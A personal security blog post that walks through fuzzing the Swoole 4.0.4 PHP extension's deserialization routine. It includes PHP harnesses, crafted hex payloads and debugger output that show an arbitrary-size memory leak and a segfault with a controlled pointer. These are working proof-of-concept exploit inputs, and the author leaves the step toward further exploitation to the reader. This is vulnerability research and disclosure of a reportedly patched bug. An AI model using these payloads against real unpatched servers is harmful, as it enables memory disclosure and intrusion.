X-C3LL's Personal Blog :)
Last weekend I was playing around with (de)serialization and PHP when I discovered a vulnerability in the deserialization routines of Swoole (version 4.0.4). Let’s talk a bit about the vulnerability!
I started by searching PHP.net for documented serialization / deserialization functions when I found this little one: Swoole\Serialize->unpack(). The first step was to look for previously reported vulnerabilities in that function because, in general, serialization / deserialization is hard to implement correctly and this kind of function has historically been prone to interesting vulnerabilities (just keep an eye on the PHP core and all the vulnerabilities related to unserialize()). Total vulnerabilities publicly disclosed: 0. Weird as hell.
As no vulnerability related to this function had been reported, maybe we have an opportunity :)
In order to generate a corpus to start the fuzzing process, I used as seeds the ones provided by Sean Heelan’s funserialize repo. These serialized seeds are known to trigger bugs in PHP’s unserialize() function, so this kind of input is perfect for discovering problematic paths inside serialization / deserialization routines. We only need to translate the serialization format into one that Swoole understands. This stupid snippet does the job:
<?php
$data = $argv[1];
$test = unserialize($data);
echo "[+] UNSERIALIZED:\n";
var_dump($test);
$obj = new \Swoole\Serialize();
echo "[+] Swoole Serialized: \n";
$sor = $obj->pack($test);
echo bin2hex($sor) . "\n";
?>
So with one of the test cases provided by the funserialize repo we obtain a hex output that represents the serialized object:
⇒ php tester.php 'a:3:{i:123;s:4:"meow";i:123;R:1;i:1;O:8:"stdClass":1:{s:4:"prop";i:4919;}}'
[+] UNSERIALIZED:
array(2) {
[123]=>
array(2) {
[123]=>
*RECURSION*
[1]=>
object(stdClass)#1 (1) {
["prop"]=>
int(4919)
}
}
[1]=>
object(stdClass)#1 (1) {
["prop"]=>
int(4919)
}
}
[+] Swoole Serialized:
e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc1003713454f46
We can save this hexadecimal representation in files and then feed them to our mutator in order to generate malformed inputs. In this case we only used a bit-flipping approach, and hundreds of crashes appeared in a few minutes. To test the inputs, just use this snippet that calls the target function:
<?php
$test = file_get_contents($argv[1]);
$obj = new \Swoole\Serialize();
$ser = $obj->unpack($test);
?>
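The mutator itself is not shown in this post, so what follows is only a minimal sketch of a bit-flipping step, written in Python. The names `flip_bits`, `mutants` and `write_corpus`, the limit of four flips per mutant and the file naming are all assumptions made for illustration.

```python
import pathlib
import random

# Seed: the Swoole-serialized bytes printed by tester.php above.
SEED = bytes.fromhex(
    "e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a"
    "010800737464436c617373018fc10037130a010800737464436c617373018fc1"
    "003713454f46"
)


def flip_bits(data: bytes, n_flips: int, rng: random.Random) -> bytes:
    """Return a copy of `data` with `n_flips` randomly chosen bits inverted."""
    out = bytearray(data)
    for _ in range(n_flips):
        pos = rng.randrange(len(out) * 8)   # pick any bit in the buffer
        out[pos // 8] ^= 1 << (pos % 8)     # invert that single bit
    return bytes(out)


def mutants(seed: bytes, count: int, max_flips: int = 4, rng_seed: int = 0):
    """Yield `count` mutated copies of `seed` (hypothetical parameters)."""
    rng = random.Random(rng_seed)
    for _ in range(count):
        yield flip_bits(seed, rng.randint(1, max_flips), rng)


def write_corpus(directory: str, count: int) -> None:
    """Write each mutant as a raw binary file that the PHP harness can read."""
    out_dir = pathlib.Path(directory)
    out_dir.mkdir(parents=True, exist_ok=True)
    for i, blob in enumerate(mutants(SEED, count)):
        (out_dir / f"mutant_{i:04d}.bin").write_bytes(blob)
```

Each file written by `write_corpus` can then be passed as the first argument to the PHP snippet above.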
One of the crashes that looked interesting was one that… well… was not a SIGSEGV. Here it is:
Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 725984920982417440 bytes) in /research/swoole-ext/hextester.php on line 5
Hum… OK. Let’s check the differences between the original (unmutated) input and the one that produces this crazy allocation:
e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc1003713454f46
e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc3003713454f46
Changing a 1 to a 3 makes it try to allocate almost 726 petabytes. That is insane. It is a weird number, right? But if we convert it from decimal to hexadecimal…
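Spotting a one-nibble change in 140 hex characters by eye is error-prone, so here is a small sketch that diffs the two inputs byte by byte. The helper name `byte_diff` is made up for this example.

```python
ORIGINAL = bytes.fromhex(
    "e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a"
    "010800737464436c617373018fc10037130a010800737464436c617373018fc1"
    "003713454f46"
)
MUTATED = bytes.fromhex(
    "e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a"
    "010800737464436c617373018fc10037130a010800737464436c617373018fc3"
    "003713454f46"
)


def byte_diff(a: bytes, b: bytes):
    """Return (offset, old, new) for every position where a and b differ."""
    if len(a) != len(b):
        raise ValueError("inputs must have the same length")
    return [(i, x, y) for i, (x, y) in enumerate(zip(a, b)) if x != y]


for offset, old, new in byte_diff(ORIGINAL, MUTATED):
    print(f"offset {offset}: {old:#04x} -> {new:#04x} (xor {old ^ new:#04x})")
```

For these two inputs the only difference is at byte offset 63 (0xc1 became 0xc3), which is a single flipped bit.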
>>> hex(725984920982417440)
'0xa1337706f727020'
OK, that string with a 1337 looks familiar… let’s change it a bit…
>>> a = str(hex(725984920982417440))[3:].decode("hex")[::-1].encode("hex")
>>> print a
2070726f703713
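The one-liner above relies on `str.decode("hex")`, which only exists in Python 2. As a sketch, the same byte reversal in Python 3 can be done with `int.to_bytes`, which also keeps the leading 0x0a byte that the `[3:]` slice dropped:

```python
size = 725984920982417440            # value from the PHP fatal error

# Interpret the number as 8 little-endian bytes, i.e. the order in memory.
raw = size.to_bytes(8, "little")

print(raw.hex())   # 2070726f7037130a
print(raw)         # b' prop7\x13\n'
```

Printed as bytes, the `prop` property name from the seed is directly visible inside the "size".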
So, during deserialization, the extension performs an allocation based on a value inside the string that we provide:
e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc1003713454f46
e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc3003713454f46
As it tried to allocate hundreds of petabytes, we can guess that the requested allocation size is not checked properly. And a size that is not checked correctly means tons of fun. Skimming the code, we can spot the lines where the allocation is made:
void *str_pool_addr = get_pack_string_len_addr(&buffer, &key_len);
p->key = zend_string_init((char*) str_pool_addr, key_len, 0);
The zend_string_init function creates a zend_string structure and copies into it, from the pointer (first argument), as many bytes as the size (second argument) says. The size to copy is set via the get_pack_string_len_addr() function:
get_pack_string_len_addr(void ** buffer, size_t *strlen)
{
...
*strlen = *((unsigned short*) str_pool_addr);
...
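To make the missing check concrete, here is a minimal sketch (in Python for brevity) of what validating a length read from untrusted input looks like. This is neither Swoole's code nor its actual patch: the function `read_length_prefixed` and the simple "little-endian length followed by data" layout are assumptions chosen only to illustrate the idea.

```python
def read_length_prefixed(buf: bytes, offset: int, len_width: int = 2) -> bytes:
    """Read a little-endian length at `offset`, then that many bytes.

    Hypothetical layout for illustration only. Both the length field and
    the data it describes must lie inside `buf`, otherwise we refuse.
    """
    if offset < 0 or offset + len_width > len(buf):
        raise ValueError("length field lies outside the buffer")
    length = int.from_bytes(buf[offset:offset + len_width], "little")
    start = offset + len_width
    if length > len(buf) - start:
        raise ValueError("declared length exceeds the remaining buffer")
    return buf[start:start + length]


print(read_length_prefixed(b"\x04\x00prop", 0))   # b'prop'
```

With such a check, a declared length larger than the remaining input is rejected before any allocation or copy takes place.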
Put a breakpoint at the allocation and run the crashing input again:
pwndbg> print key_len
$116 = 725984920982417412
So our theory was right: the key_len extracted via get_pack_string_len_addr() is used in the allocation. With the unmutated serialized data the value is:
Breakpoint swoole_serialize.c:709
pwndbg> print key_len
$117 = 4
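The two key_len values and the size in the PHP fatal error can be tied together with a few lines of Python. The sketch below makes two assumptions: that the length is read starting at byte offset 24 of the buffer (where the `04 70 72 6f 70` bytes sit), and that the build is 64-bit PHP 7, where a zend_string has a 24-byte header and the allocation is `header + len + 1` rounded up to a multiple of 8.

```python
BUF = bytes.fromhex(
    "e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a"
    "010800737464436c617373018fc10037130a010800737464436c617373018fc1"
    "003713454f46"
)

ZSTR_HEADER_SIZE = 24   # assumed: offsetof(zend_string, val) on 64-bit PHP 7
ALIGNMENT = 8           # assumed: Zend memory manager alignment


def zend_string_alloc_size(length: int) -> int:
    """Header + payload + NUL terminator, rounded up to the alignment."""
    raw = ZSTR_HEADER_SIZE + length + 1
    return (raw + ALIGNMENT - 1) & ~(ALIGNMENT - 1)


narrow = BUF[24]                              # one byte read at offset 24
wide = int.from_bytes(BUF[24:32], "little")   # eight bytes at the same offset

print(narrow)                         # 4
print(wide)                           # 725984920982417412
print(zend_string_alloc_size(wide))   # 725984920982417440
```

Under those assumptions the wide read reproduces the key_len seen in the debugger, and the rounded-up allocation size matches the number in the "Allowed memory size" error.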
Mmm… and what if we change the original c1 to an a0?
Breakpoint swoole_serialize.c:709
pwndbg> print key_len
$119 = 8030604250369323891
>>> a = str(hex(8030604250369323891))[2:].decode("hex")[::-1].encode("hex")
>>> print a
7373018b0470726f
e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc3003713454f46
e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fa0003713454f46
The value taken was shifted. Nice!
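To see how far the read position moved, the sketch below looks up where each key_len value (as 8 little-endian bytes) occurs in the serialized buffer. The helper name `locate` is made up for this example.

```python
BUF = bytes.fromhex(
    "e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a"
    "010800737464436c617373018fc10037130a010800737464436c617373018fc1"
    "003713454f46"
)


def locate(key_len: int) -> int:
    """Offset in BUF where key_len appears as 8 little-endian bytes."""
    return BUF.find(key_len.to_bytes(8, "little"))


print(locate(725984920982417412))    # 24 (mutated byte c3)
print(locate(8030604250369323891))   # 20 (mutated byte a0)
```

In these two samples the position happens to equal the mutated byte shifted right by three bits (0xc3 >> 3 == 24, 0xa0 >> 3 == 20). That is only an observation drawn from the dumps in this post; it has not been checked against the Swoole source.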
At this point we have triaged the issue that makes our code crash. Now it’s time to start playing a bit with this little boy. If we calculate the right position, the key_len value used for the allocation will be controlled by us (as we can serialize any integer), so we can leak an arbitrarily sized chunk of memory. Let’s try to leak 255 bytes (ff):
e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037ff0a010800737464436c617373018fc10037130a010800737464436c617373018ff1003713454f46
<?php
$data = "e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037ff0a010800737464436c617373018fc10037130a010800737464436c617373018ff1003713454f46";
$obj = new \Swoole\Serialize();
$sor = hex2bin($data);
$ser = $obj->unpack($sor);
echo "[+] Swoole Unserialized:\n";
var_dump($ser);
echo "[+] Memory Leaked:\n";
$keys = key(get_object_vars($ser[1]));
echo bin2hex($keys);
echo "\n[+] Size: \n";
echo strlen($keys);
?>
Nailed!
⇒ php memory_leak.php
[+] Swoole Unserialized:
array(2) {
[123]=>
array(2) {
[123]=>
array(2) {
[123]=>
NULL
[1]=>
object(stdClass)#2 (1) {
["prop"]=>
int(-201)
}
}
[1]=>
object(stdClass)#3 (1) {
["prop"]=>
int(4919)
}
}
[1]=>
object(stdClass)#4 (1) {
["
stdClass7
stdClass7EOFH@@`p@ @P@"]=>
int(4919)
}
}
[+] Memory Leaked:
0a010800737464436c617373018fc10037130a010800737464436c617373018ff1003713454f460000c0f0c702bd
7f000048f0c702bd7f0000400000000000000040b2c702bd7f00000614000002000000050200000200000060f0c7
02bd7f000070f0c702bd7f00004000000000000000c093c602bd7f00000614000003000000000100000300000020
f1c702bd7f0000400000000000000050b1c602bd7f000006140000030000004000000000000000c815c002bd7f00
00061400000300000080000000030000000000000000000000000000000000000000000000000000000000000000
00000080f1c702bd7f00000e02000003000000c8f0c702bd7f
[+] Size:
255
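A quick way to read this dump is to check how much of it is simply the tail of our own input and how much comes from whatever lies after it in memory. The sketch below uses only the payload and the first bytes of the leak shown above; the variable names are illustrative.

```python
PAYLOAD = bytes.fromhex(
    "e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037ff0a"
    "010800737464436c617373018fc10037130a010800737464436c617373018ff1"
    "003713454f46"
)
# Beginning of the leaked key, copied from the output above.
LEAK_PREFIX = bytes.fromhex(
    "0a010800737464436c617373018fc10037130a010800737464436c617373018f"
    "f1003713454f46"
)
LEAK_SIZE = 255

start = PAYLOAD.find(LEAK_PREFIX)   # where the copied data begins
in_buffer = len(PAYLOAD) - start    # bytes that are still our own input
beyond = LEAK_SIZE - in_buffer      # bytes read past the end of the input

print(start, in_buffer, beyond)     # 31 39 216

# The first 8-byte group after two zero bytes, read as little-endian.
first_ptr = int.from_bytes(bytes.fromhex("c0f0c702bd7f0000"), "little")
print(hex(first_ptr))               # 0x7fbd02c7f0c0
```

So the copy starts right after the ff byte, and 216 of the 255 leaked bytes lie beyond the serialized input. Values such as 0x7fbd02c7f0c0 look like process addresses, although that interpretation is a guess based on their shape.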
Playing around a bit, you can perform bigger leaks, like this one (24946 bytes):
<?php
$data = "e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018ff6003713454f46";
$obj = new \Swoole\Serialize();
$sor = hex2bin($data);
$ser = $obj->unpack($sor);
echo "[+] Swoole Unserialized:\n";
var_dump($ser);
echo "[+] Memory Leaked:\n";
$keys = key(get_object_vars($ser[1]));
echo bin2hex($keys);
echo "\n[+] Size: \n";
echo strlen($keys);
?>
Let’s swap our seed ('a:3:{i:123;s:4:"meow";i:123;R:1;i:1;O:8:"stdClass":1:{s:4:"prop";i:4919;}}') for one with a bigger integer (0x41414141 == 1094795585) and compare them:
[4919 (0x1337)]
e8 02 ea7b 02ea 7b 02 22 7b0a
01 08 00 737464436c617373
01 8b 04 70726f70 37130a
01 08 00 737464436c617373
01 8f c1 0037130a
01 08 00 737464436c617373
01 8f c1 003713
454f46
[1094795585 (0x41414141)]
e8 02 ea7b 02ea 7b 02 22 7b0a
01 08 00 737464436c617373
01 93 04 70726f70 414141410a
01 08 00 737464436c617373
01 97 c1 00414141410a
01 08 00 737464436c617373
01 97 c1 0041414141
454f46
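The two dumps can be compared with a few lines of Python. The sketch below decodes the integer payloads as little-endian and looks at which bits change in the byte that precedes them. Treating bits 3 and 4 of that byte as a separate field is an assumption drawn from these samples, not something confirmed from the Swoole source; `le_int` and `bits_3_4` are hypothetical helper names.

```python
def le_int(hex_payload: str) -> int:
    """Decode a hex string as a little-endian unsigned integer."""
    return int.from_bytes(bytes.fromhex(hex_payload), "little")


def bits_3_4(type_byte: int) -> int:
    """Extract bits 3 and 4 of the byte (assumed to be one field)."""
    return (type_byte >> 3) & 0b11


print(le_int("3713"))        # 4919       (2-byte payload)
print(le_int("41414141"))    # 1094795585 (4-byte payload)

print(f"{0x8f ^ 0x97:08b}")  # 00011000: only bits 3 and 4 differ
for type_byte in (0x8B, 0x93, 0x8F, 0x97):
    print(hex(type_byte), bits_3_4(type_byte))
```

For 0x8b and 0x8f (2-byte payloads) the extracted value is 1, and for 0x93 and 0x97 (4-byte payloads) it is 2.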
So the difference is from 8f (with 2 bytes, 3713) to 97 (with 4 bytes, 41414141); please note that the difference between 8f and 97 is 8. What happens if we change that 97 to an 8f in the last entry?
e802ea7b02ea7b02227b0a010800737464436c61737301930470726f70414141410a010800737464436c6173730197c100414141410a010800737464436c617373018fc10041414141454f46
[+] Swoole Unserialized:
array(2) {
[123]=>
array(2) {
[123]=>
array(2) {
[123]=>
NULL
[1]=>
object(stdClass)#2 (1) {
["prop"]=>
int(1094795585)
}
}
[1]=>
object(stdClass)#3 (1) {
["prop"]=>
int(1094795585)
}
}
[1]=>
object(stdClass)#4 (1) {
["prop"]=>
int(16705)
}
}
Getting 16705 instead of the expected 1094795585 means that only 2 bytes were taken (16705 == 0x4141). What happens if we set it to zero?
e802ea7b02ea7b02227b0a010800737464436c61737301930470726f70414141410a010800737464436c6173730197c100414141410a010800737464436c6173730100c10041414141454f46
...
44 static zend_always_inline void i_zval_ptr_dtor(zval *zval_ptr ZEND_FILE_LINE_DC)
45 {
46 if (Z_REFCOUNTED_P(zval_ptr)) {
47 zend_refcounted *ref = Z_COUNTED_P(zval_ptr);
► 48 if (!--GC_REFCOUNT(ref)) {
49 _zval_dtor_func(ref ZEND_FILE_LINE_RELAY_CC);
....
Program received signal SIGSEGV (fault address 0x41414141)
pwndbg> i r
rax 0x41414141 1094795585
rbx 0x0 0
rcx 0x14 20
rdx 0x1 1
rsi 0x7ffff3864b60 140737279052640
rdi 0x7ffff38023f0 140737278649328
rbp 0x7fffffff7480 0x7fffffff7480
rsp 0x7fffffff73d0 0x7fffffff73d0
r8 0xffff 65535
r9 0x7fffffff79fc 140737488321020
r10 0x941 2369
r11 0x555555bbc584 93824998950276
r12 0x555555684d10 93824993479952
r13 0x7fffffffe460 140737488348256
r14 0x7ffff381c030 140737278754864
r15 0x7ffff3870160 140737279099232
rip 0x555555bc0850 0x555555bc0850 <zend_array_destroy+487>
eflags 0x10202 [ IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
Oh snaps! Is that a mighty zval_ptr_dtor? Is that our brave 0x41414141? And can we copy structures freely, as we have seen before? Can we leak memory too? This looks like an adventure for you, my dearest reader :).
The vulnerability is already patched in the GitHub master branch (it is a live project with almost daily updates). I am not sure whether this kind of article is useful, but at least it works as a “log” for myself. If you find it interesting, or spot any error or typo, feel free to contact me on Twitter (@TheXC3LL).